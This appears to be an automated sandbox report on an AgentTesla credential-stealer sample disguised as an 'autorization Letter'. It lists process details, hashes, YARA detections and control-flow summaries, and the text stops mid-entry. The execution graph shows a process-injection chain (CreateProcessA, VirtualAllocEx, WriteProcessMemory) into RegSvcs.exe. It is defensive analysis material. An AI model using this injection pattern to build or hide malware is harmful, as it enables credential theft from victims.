                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                Imagebase:0x540000
                                                                File size:45'984 bytes
                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3346316308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3346316308.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3346316308.000000000282C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3346316308.000000000282C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:16
                                                                Start time:01:03:20
                                                                Start date:26/09/2024
                                                                Path:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                                                                Imagebase:0x900000
                                                                File size:45'984 bytes
                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:17
                                                                Start time:01:03:20
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:18
                                                                Start time:01:03:28
                                                                Start date:26/09/2024
                                                                Path:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                                                                Imagebase:0x5c0000
                                                                File size:45'984 bytes
                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:19
                                                                Start time:01:03:28
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:11%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:195
                                                                  Total number of Limit Nodes:17
                                                                  execution_graph 31441 16b4668 31442 16b467a 31441->31442 31443 16b4686 31442->31443 31447 16b4779 31442->31447 31452 16b4210 31443->31452 31445 16b46a5 31448 16b479d 31447->31448 31456 16b4879 31448->31456 31460 16b4888 31448->31460 31449 16b47a7 31449->31443 31453 16b421b 31452->31453 31468 16b5c78 31453->31468 31455 16b708d 31455->31445 31457 16b48af 31456->31457 31458 16b498c 31457->31458 31464 16b44d4 31457->31464 31458->31449 31461 16b48af 31460->31461 31462 16b498c 31461->31462 31463 16b44d4 CreateActCtxA 31461->31463 31462->31449 31463->31462 31465 16b5918 CreateActCtxA 31464->31465 31467 16b59db 31465->31467 31469 16b5c83 31468->31469 31472 16b5c98 31469->31472 31471 16b7135 31471->31455 31473 16b5ca3 31472->31473 31476 16b5cc8 31473->31476 31475 16b721a 31475->31471 31477 16b5cd3 31476->31477 31480 16b5cf8 31477->31480 31479 16b730d 31479->31475 31482 16b5d03 31480->31482 31481 16b8649 31481->31479 31483 16b860b 31482->31483 31486 16bacb9 31482->31486 31483->31481 31490 16bcda0 31483->31490 31495 16bace0 31486->31495 31499 16bacf0 31486->31499 31487 16bacce 31487->31483 31491 16bcdd1 31490->31491 31492 16bcdf5 31491->31492 31507 16bcf4f 31491->31507 31511 16bcf60 31491->31511 31492->31481 31496 16bacf0 31495->31496 31502 16bade8 31496->31502 31497 16bacff 31497->31487 31501 16bade8 GetModuleHandleW 31499->31501 31500 16bacff 31500->31487 31501->31500 31503 16bae1c 31502->31503 31504 16badf9 31502->31504 31503->31497 31504->31503 31505 16bb020 GetModuleHandleW 31504->31505 31506 16bb04d 31505->31506 31506->31497 31508 16bcf6d 31507->31508 31510 16bcfa7 31508->31510 31515 16bb7c0 31508->31515 31510->31492 31512 16bcf6d 31511->31512 31513 16bcfa7 31512->31513 31514 16bb7c0 GetModuleHandleW 31512->31514 31513->31492 31514->31513 31516 16bb7cb 31515->31516 31518 16bdcb8 31516->31518 31519 16bd0c4 31516->31519 31518->31518 31520 16bd0cf 31519->31520 31521 16b5cf8 GetModuleHandleW 31520->31521 31522 16bdd27 31521->31522 31522->31518 31523 16bd478 31524 16bd4be GetCurrentProcess 31523->31524 31526 16bd509 31524->31526 31527 16bd510 GetCurrentThread 31524->31527 31526->31527 31528 16bd54d GetCurrentProcess 31527->31528 31529 16bd546 31527->31529 31530 16bd583 31528->31530 31529->31528 31531 16bd5ab GetCurrentThreadId 31530->31531 31532 16bd5dc 31531->31532 31668 58a21e0 31669 58a21e1 31668->31669 31672 58a170c 31669->31672 31671 58a21ed 31673 58a1717 31672->31673 31675 16b5cc8 GetModuleHandleW 31673->31675 31677 16b7258 31673->31677 31674 58a2384 31674->31671 31675->31674 31678 16b729b 31677->31678 31679 16b5cf8 GetModuleHandleW 31678->31679 31680 16b730d 31679->31680 31680->31674 31533 7930d08 31534 7930bdc 31533->31534 31535 7930beb 31534->31535 31538 7933bc1 31534->31538 31552 7933bd0 31534->31552 31539 7933bea 31538->31539 31540 7933c0e 31539->31540 31566 7934273 31539->31566 31574 7934a4f 31539->31574 31579 79340c8 31539->31579 31586 7934508 31539->31586 31594 79347e9 31539->31594 31598 79343cb 31539->31598 31603 79343fd 31539->31603 31608 79341b9 31539->31608 31615 7934439 31539->31615 31623 793411b 31539->31623 31628 7934033 31539->31628 31540->31534 31553 7933bea 31552->31553 31554 7933c0e 31553->31554 31555 7934273 2 API calls 31553->31555 31556 7934033 4 API calls 31553->31556 31557 793411b 2 API calls 31553->31557 31558 7934439 2 API calls 31553->31558 31559 79341b9 4 API calls 31553->31559 31560 79343fd 2 API calls 31553->31560 31561 79343cb 2 API calls 31553->31561 31562 79347e9 2 API calls 31553->31562 31563 7934508 2 API calls 31553->31563 31564 79340c8 4 API calls 31553->31564 31565 7934a4f 2 API calls 31553->31565 31554->31534 31555->31554 31556->31554 31557->31554 31558->31554 31559->31554 31560->31554 31561->31554 31562->31554 31563->31554 31564->31554 31565->31554 31567 7934279 31566->31567 31636 7930530 31567->31636 31640 7930538 31567->31640 31568 7934124 31569 79345c4 31568->31569 31572 7930530 WriteProcessMemory 31568->31572 31573 7930538 WriteProcessMemory 31568->31573 31569->31540 31572->31568 31573->31568 31575 7934124 31574->31575 31576 79347bb 31575->31576 31577 7930530 WriteProcessMemory 31575->31577 31578 7930538 WriteProcessMemory 31575->31578 31576->31540 31577->31575 31578->31575 31644 79307c0 31579->31644 31648 79307b4 31579->31648 31587 7934453 31586->31587 31592 7930530 WriteProcessMemory 31587->31592 31593 7930538 WriteProcessMemory 31587->31593 31588 79345c4 31588->31540 31589 7934124 31589->31588 31590 7930530 WriteProcessMemory 31589->31590 31591 7930538 WriteProcessMemory 31589->31591 31590->31589 31591->31589 31592->31589 31593->31589 31652 7930470 31594->31652 31656 7930478 31594->31656 31595 793480a 31599 79343ee 31598->31599 31601 7930530 WriteProcessMemory 31599->31601 31602 7930538 WriteProcessMemory 31599->31602 31600 793470d 31601->31600 31602->31600 31605 7934124 31603->31605 31604 79347bb 31604->31540 31605->31603 31605->31604 31606 7930530 WriteProcessMemory 31605->31606 31607 7930538 WriteProcessMemory 31605->31607 31606->31605 31607->31605 31660 7930620 31608->31660 31664 7930628 31608->31664 31609 7934124 31610 79344e5 31609->31610 31613 7930530 WriteProcessMemory 31609->31613 31614 7930538 WriteProcessMemory 31609->31614 31610->31540 31613->31609 31614->31609 31616 7934446 31615->31616 31619 7930530 WriteProcessMemory 31616->31619 31620 7930538 WriteProcessMemory 31616->31620 31617 79345c4 31617->31540 31618 7934124 31618->31617 31621 7930530 WriteProcessMemory 31618->31621 31622 7930538 WriteProcessMemory 31618->31622 31619->31618 31620->31618 31621->31618 31622->31618 31625 7934124 31623->31625 31624 79347bb 31624->31540 31625->31624 31626 7930530 WriteProcessMemory 31625->31626 31627 7930538 WriteProcessMemory 31625->31627 31626->31625 31627->31625 31629 793403e 31628->31629 31631 79340fc 31629->31631 31634 79307c0 CreateProcessA 31629->31634 31635 79307b4 CreateProcessA 31629->31635 31630 79347bb 31630->31540 31631->31630 31632 7930530 WriteProcessMemory 31631->31632 31633 7930538 WriteProcessMemory 31631->31633 31632->31631 31633->31631 31634->31631 31635->31631 31637 793053b WriteProcessMemory 31636->31637 31639 79305d7 31637->31639 31639->31568 31641 7930580 WriteProcessMemory 31640->31641 31643 79305d7 31641->31643 31643->31568 31645 7930849 31644->31645 31645->31645 31646 79309ae CreateProcessA 31645->31646 31647 7930a0b 31646->31647 31649 79307c3 31648->31649 31649->31649 31650 79309ae CreateProcessA 31649->31650 31651 7930a0b 31650->31651 31653 793047b VirtualAllocEx 31652->31653 31655 79304f5 31653->31655 31655->31595 31657 79304b8 VirtualAllocEx 31656->31657 31659 79304f5 31657->31659 31659->31595 31661 7930625 ReadProcessMemory 31660->31661 31663 79306b7 31661->31663 31663->31609 31665 7930673 ReadProcessMemory 31664->31665 31667 79306b7 31665->31667 31667->31609 31681 16bd6c0 DuplicateHandle 31682 16bd756 31681->31682 31683 7934ea8 31684 7935033 31683->31684 31685 7934ece 31683->31685 31685->31684 31687 79315e8 31685->31687 31688 7935128 PostMessageW 31687->31688 31689 7935194 31688->31689 31689->31685

                                                                  Executed Functions

                                                                  Function 016BD468 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 294 16bd468-16bd507 GetCurrentProcess 298 16bd509-16bd50f 294->298 299 16bd510-16bd544 GetCurrentThread 294->299 298->299 300 16bd54d-16bd581 GetCurrentProcess 299->300 301 16bd546-16bd54c 299->301 302 16bd58a-16bd5a5 call 16bd647 300->302 303 16bd583-16bd589 300->303 301->300 307 16bd5ab-16bd5da GetCurrentThreadId 302->307 303->302 308 16bd5dc-16bd5e2 307->308 309 16bd5e3-16bd645 307->309 308->309
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 016BD4F6
                                                                  • GetCurrentThread.KERNEL32 ref: 016BD533
                                                                  • GetCurrentProcess.KERNEL32 ref: 016BD570
                                                                  • GetCurrentThreadId.KERNEL32 ref: 016BD5C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: ae2045cf7c56e5f01f685c3d9205a4b13d77054534c52c67443612c764fdf0c9
                                                                  • Instruction ID: 907aab05030d866db52570d6fc779efe5686c8339f79226c10de484fe69781e1
                                                                  • Opcode Fuzzy Hash: ae2045cf7c56e5f01f685c3d9205a4b13d77054534c52c67443612c764fdf0c9
                                                                  • Instruction Fuzzy Hash: 965159B09012498FDB54DFA9D988BEEBBF1FF88308F248459D009A7360D7399984CF65
                                                                  Function 016BD478 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 316 16bd478-16bd507 GetCurrentProcess 320 16bd509-16bd50f 316->320 321 16bd510-16bd544 GetCurrentThread 316->321 320->321 322 16bd54d-16bd581 GetCurrentProcess 321->322 323 16bd546-16bd54c 321->323 324 16bd58a-16bd5a5 call 16bd647 322->324 325 16bd583-16bd589 322->325 323->322 329 16bd5ab-16bd5da GetCurrentThreadId 324->329 325->324 330 16bd5dc-16bd5e2 329->330 331 16bd5e3-16bd645 329->331 330->331
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 016BD4F6
                                                                  • GetCurrentThread.KERNEL32 ref: 016BD533
                                                                  • GetCurrentProcess.KERNEL32 ref: 016BD570
                                                                  • GetCurrentThreadId.KERNEL32 ref: 016BD5C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: f06ff9eaf7d677f52a7e14f13d025ec7c1e68fcfd3b5819596aa02e0a3e890ec
                                                                  • Instruction ID: d82bce0ecd31db135f51f0ebcc5ccd18d58d5dde1a817f43c96d39c62722f474
                                                                  • Opcode Fuzzy Hash: f06ff9eaf7d677f52a7e14f13d025ec7c1e68fcfd3b5819596aa02e0a3e890ec
                                                                  • Instruction Fuzzy Hash: FE516AB09002098FDB58DFA9D988BEEBBF1FF88308F208459D109A7360D7359984CF65
                                                                  Function 058A79E0 Relevance: 2.7, Strings: 2, Instructions: 160COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 361 58a79e0-58a7aca 366 58a7ad6-58a7ae5 call 58a8620 361->366 367 58a7aeb-58a7b04 366->367 371 58a7b66-58a7c4b call 58a6584 call 58a56c8 call 58a6594 367->371 372 58a7b06-58a7b5e 367->372 372->371
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $
                                                                  • API String ID: 0-227171996
                                                                  • Opcode ID: d5fd5bf8601c6d45c1648d82d7cdabdb4f95c125e40484774ea4566d53bd79c0
                                                                  • Instruction ID: 7b5c640410e4afa9a0f305a46f91ba10948b5896c8b240cd2f9a94ebfb0be38d
                                                                  • Opcode Fuzzy Hash: d5fd5bf8601c6d45c1648d82d7cdabdb4f95c125e40484774ea4566d53bd79c0
                                                                  • Instruction Fuzzy Hash: F471C431920701CFEB04EF29D4859457BF1FF89304B4586A8D949AB32AEB71F8D4CB90
                                                                  Function 058A6554 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 386 58a6554-58a7b04 call 58a8620 396 58a7b66-58a7c4b call 58a6584 call 58a56c8 call 58a6594 386->396 397 58a7b06-58a7b5e 386->397 397->396
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $
                                                                  • API String ID: 0-227171996
                                                                  • Opcode ID: e883533ba312f367dc9e0fea27c6c4c85da377dc6531b61e2c0d26440cbd083e
                                                                  • Instruction ID: 9e53a7e4e055852b139aa2e5d284e07ef32b00c8f3b20c3f5246acac7c91a094
                                                                  • Opcode Fuzzy Hash: e883533ba312f367dc9e0fea27c6c4c85da377dc6531b61e2c0d26440cbd083e
                                                                  • Instruction Fuzzy Hash: C961B431920701CFEB04EF29D4859557BF1FF89304B4586A8D949AB32AEB71F9D4CB90
                                                                  Function 058A3830 Relevance: 2.6, Strings: 2, Instructions: 74COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 411 58a3830-58a3832 412 58a3839-58a383a 411->412 413 58a3834-58a3838 411->413 415 58a383c-58a383d 412->415 416 58a3841-58a3853 412->416 413->412 414 58a380a-58a3820 413->414 415->416 418 58a385d-58a3860 416->418 419 58a3868-58a391d 418->419
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q${ m^
                                                                  • API String ID: 0-4065714871
                                                                  • Opcode ID: 84e3d0ccc61cadd517b7e2b24fa1e8c6d8b7c419c26edd72f96a1275c53ae946
                                                                  • Instruction ID: 43a343df527099b5b185b6baa148f701a860893b3737d207f2fedc2ae44e75c6
                                                                  • Opcode Fuzzy Hash: 84e3d0ccc61cadd517b7e2b24fa1e8c6d8b7c419c26edd72f96a1275c53ae946
                                                                  • Instruction Fuzzy Hash: 1321B471A002068FDB05DFB8D9519EE7FBAFF85300F4045A5C541AB264DF759D09CBA2
                                                                  Function 058A3840 Relevance: 2.6, Strings: 2, Instructions: 58COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 434 58a3840-58a3860 437 58a3868-58a391d 434->437
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q${ m^
                                                                  • API String ID: 0-4065714871
                                                                  • Opcode ID: 9563dd4e5aa20b98cc21af301df74502f64ea537801ff4ccd298965c4484f5b8
                                                                  • Instruction ID: 56051fe6a8bcb43dc4db374fb4f71c39c808736991254158ba7debe9472c591f
                                                                  • Opcode Fuzzy Hash: 9563dd4e5aa20b98cc21af301df74502f64ea537801ff4ccd298965c4484f5b8
                                                                  • Instruction Fuzzy Hash: 23114570E0010A9FDB05EFB8D9519EE7BBAFF84304F404565C501AB264EF75AD49CBA2
                                                                  Function 079307B4 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 452 79307b4-7930855 455 7930857-7930861 452->455 456 793088e-79308ae 452->456 455->456 457 7930863-7930865 455->457 463 79308b0-79308ba 456->463 464 79308e7-7930916 456->464 458 7930867-7930871 457->458 459 7930888-793088b 457->459 461 7930873 458->461 462 7930875-7930884 458->462 459->456 461->462 462->462 465 7930886 462->465 463->464 466 79308bc-79308be 463->466 470 7930918-7930922 464->470 471 793094f-7930a09 CreateProcessA 464->471 465->459 468 79308e1-79308e4 466->468 469 79308c0-79308ca 466->469 468->464 472 79308ce-79308dd 469->472 473 79308cc 469->473 470->471 474 7930924-7930926 470->474 484 7930a12-7930a98 471->484 485 7930a0b-7930a11 471->485 472->472 475 79308df 472->475 473->472 476 7930949-793094c 474->476 477 7930928-7930932 474->477 475->468 476->471 479 7930936-7930945 477->479 480 7930934 477->480 479->479 481 7930947 479->481 480->479 481->476 495 7930a9a-7930a9e 484->495 496 7930aa8-7930aac 484->496 485->484 495->496 497 7930aa0 495->497 498 7930aae-7930ab2 496->498 499 7930abc-7930ac0 496->499 497->496 498->499 500 7930ab4 498->500 501 7930ac2-7930ac6 499->501 502 7930ad0-7930ad4 499->502 500->499 501->502 503 7930ac8 501->503 504 7930ae6-7930aed 502->504 505 7930ad6-7930adc 502->505 503->502 506 7930b04 504->506 507 7930aef-7930afe 504->507 505->504 509 7930b05 506->509 507->506 509->509
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079309F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 15f7caaf1d2460b723114380d5b25f56ae2baa9fa5af1bf173c6a1f2ffdc33cc
                                                                  • Instruction ID: 5045f1c77a4775a7cd3bac80aac6ee29ac547728014426a4db90206057f63951
                                                                  • Opcode Fuzzy Hash: 15f7caaf1d2460b723114380d5b25f56ae2baa9fa5af1bf173c6a1f2ffdc33cc
                                                                  • Instruction Fuzzy Hash: 90A16BB1D0021ADFDB24DF68C841BEEBBB6FF48314F148169D818A7290DB759985CF92
                                                                  Function 079307C0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 510 79307c0-7930855 512 7930857-7930861 510->512 513 793088e-79308ae 510->513 512->513 514 7930863-7930865 512->514 520 79308b0-79308ba 513->520 521 79308e7-7930916 513->521 515 7930867-7930871 514->515 516 7930888-793088b 514->516 518 7930873 515->518 519 7930875-7930884 515->519 516->513 518->519 519->519 522 7930886 519->522 520->521 523 79308bc-79308be 520->523 527 7930918-7930922 521->527 528 793094f-7930a09 CreateProcessA 521->528 522->516 525 79308e1-79308e4 523->525 526 79308c0-79308ca 523->526 525->521 529 79308ce-79308dd 526->529 530 79308cc 526->530 527->528 531 7930924-7930926 527->531 541 7930a12-7930a98 528->541 542 7930a0b-7930a11 528->542 529->529 532 79308df 529->532 530->529 533 7930949-793094c 531->533 534 7930928-7930932 531->534 532->525 533->528 536 7930936-7930945 534->536 537 7930934 534->537 536->536 538 7930947 536->538 537->536 538->533 552 7930a9a-7930a9e 541->552 553 7930aa8-7930aac 541->553 542->541 552->553 554 7930aa0 552->554 555 7930aae-7930ab2 553->555 556 7930abc-7930ac0 553->556 554->553 555->556 557 7930ab4 555->557 558 7930ac2-7930ac6 556->558 559 7930ad0-7930ad4 556->559 557->556 558->559 560 7930ac8 558->560 561 7930ae6-7930aed 559->561 562 7930ad6-7930adc 559->562 560->559 563 7930b04 561->563 564 7930aef-7930afe 561->564 562->561 566 7930b05 563->566 564->563 566->566
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079309F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: fc44bb6b439ddd38b1bd2f85fbdd3c6f34022835e24e4441fafa16971bf30668
                                                                  • Instruction ID: 15527f38b45139e167bb5517c5fc318cd7c1b22202fd5d2f15813026a2720d34
                                                                  • Opcode Fuzzy Hash: fc44bb6b439ddd38b1bd2f85fbdd3c6f34022835e24e4441fafa16971bf30668
                                                                  • Instruction Fuzzy Hash: AD916BB1D0021ACFDB24DF68C841BEEBBB6FF44314F148169D818A7280DB759985CF92
                                                                  Function 016BADE8 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 567 16bade8-16badf7 568 16badf9-16bae06 call 16b9414 567->568 569 16bae23-16bae27 567->569 575 16bae08 568->575 576 16bae1c 568->576 571 16bae3b-16bae7c 569->571 572 16bae29-16bae33 569->572 578 16bae89-16bae97 571->578 579 16bae7e-16bae86 571->579 572->571 622 16bae0e call 16bb070 575->622 623 16bae0e call 16bb080 575->623 576->569 580 16baebb-16baebd 578->580 581 16bae99-16bae9e 578->581 579->578 586 16baec0-16baec7 580->586 583 16baea9 581->583 584 16baea0-16baea7 call 16ba150 581->584 582 16bae14-16bae16 582->576 585 16baf58-16bb018 582->585 588 16baeab-16baeb9 583->588 584->588 617 16bb01a-16bb01d 585->617 618 16bb020-16bb04b GetModuleHandleW 585->618 589 16baec9-16baed1 586->589 590 16baed4-16baedb 586->590 588->586 589->590 593 16baee8-16baef1 call 16ba160 590->593 594 16baedd-16baee5 590->594 598 16baefe-16baf03 593->598 599 16baef3-16baefb 593->599 594->593 600 16baf21-16baf2e 598->600 601 16baf05-16baf0c 598->601 599->598 608 16baf51-16baf57 600->608 609 16baf30-16baf4e 600->609 601->600 603 16baf0e-16baf1e call 16ba170 call 16ba180 601->603 603->600 609->608 617->618 619 16bb04d-16bb053 618->619 620 16bb054-16bb068 618->620 619->620 622->582 623->582
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 016BB03E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 4df3fff8347a19d9a010a5fc8210c336643a4efcb1edb0213705fffb62e3ab9f
                                                                  • Instruction ID: b526738f3985c7b4344f3e7ca459b31f8525d9a132aae09ba2f696649ff9f895
                                                                  • Opcode Fuzzy Hash: 4df3fff8347a19d9a010a5fc8210c336643a4efcb1edb0213705fffb62e3ab9f
                                                                  • Instruction Fuzzy Hash: FD813470A00B059FD764DF69D88079ABBF6FF88200F008A2DD54AD7B50DB75E886CB95
                                                                  Function 016B590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 624 16b590c-16b59d9 CreateActCtxA 626 16b59db-16b59e1 624->626 627 16b59e2-16b5a3c 624->627 626->627 634 16b5a4b-16b5a4f 627->634 635 16b5a3e-16b5a41 627->635 636 16b5a51-16b5a5d 634->636 637 16b5a60 634->637 635->634 636->637 639 16b5a61 637->639 639->639
                                                                  APIs
                                                                  • CreateActCtxA.KERNEL32(?), ref: 016B59C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: 2b6fe5dea264587ccb3ef29cacf1acbd83134eb3be0a467100202664899e7e3d
                                                                  • Instruction ID: 594128fe8c0f5e21a5042e8d42fff0ce63391ba52664528e2dafb263a85fd914
                                                                  • Opcode Fuzzy Hash: 2b6fe5dea264587ccb3ef29cacf1acbd83134eb3be0a467100202664899e7e3d
                                                                  • Instruction Fuzzy Hash: AD41D1B1C00719CFDB24DFA9C884BDEBBB2BF49304F20816AD509AB255DB755986CF90
                                                                  Function 016B44D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 640 16b44d4-16b59d9 CreateActCtxA 643 16b59db-16b59e1 640->643 644 16b59e2-16b5a3c 640->644 643->644 651 16b5a4b-16b5a4f 644->651 652 16b5a3e-16b5a41 644->652 653 16b5a51-16b5a5d 651->653 654 16b5a60 651->654 652->651 653->654 656 16b5a61 654->656 656->656
                                                                  APIs
                                                                  • CreateActCtxA.KERNEL32(?), ref: 016B59C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
